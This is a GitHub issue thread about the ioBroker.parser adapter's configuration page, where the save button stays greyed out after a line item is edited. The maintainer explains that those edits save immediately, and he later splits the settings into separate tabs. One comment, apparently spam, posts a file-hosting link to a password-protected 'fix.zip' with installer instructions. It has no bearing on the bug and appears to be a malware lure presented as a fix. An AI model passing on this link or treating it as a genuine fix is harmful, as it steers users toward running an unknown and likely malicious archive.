### ISSUE TITLE
No save option when changing a line item

### ISSUE THREAD

**Issue by looxer01** [ioBroker/ioBroker.parser#269]
**Describe the bug**  
When entering the configuration page, everything seems to be ok and working
When changing a line item the gui does not alow to save the changes (speichern - greyed out)
Only when I change a header item it allows to save.

**To Reproduce**  
1. Go to instances configuration
2. Click on any line existing line and change
4. save button is greyed out

**Expected behavior**  

**Screenshots & Logfiles**  
If applicable, add screenshots and logfiles to help explain your problem.

**Versions:**  
 - Adapter version: 2.2.2
 - JS-Controller version: 6.0.11
 - Node version: 20.17.0
 - Operating system: Debian Bookworm (fresh updated)

**Additional context**

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GermanBluefox** [comment]
I would say it is not an error, bug the feature. The changes are saved immediately and the process is visualized by red background,

**Comment by looxer01** [comment]
thank you for clarification. 
It is a bit irritating as the change of a heading item requires an explicite save but the change of a line item does not.
Also in all other adapters I know it is not implemented that way.

**Comment by GermanBluefox** [comment]
I divided now the settings in two tabs: general and tasks
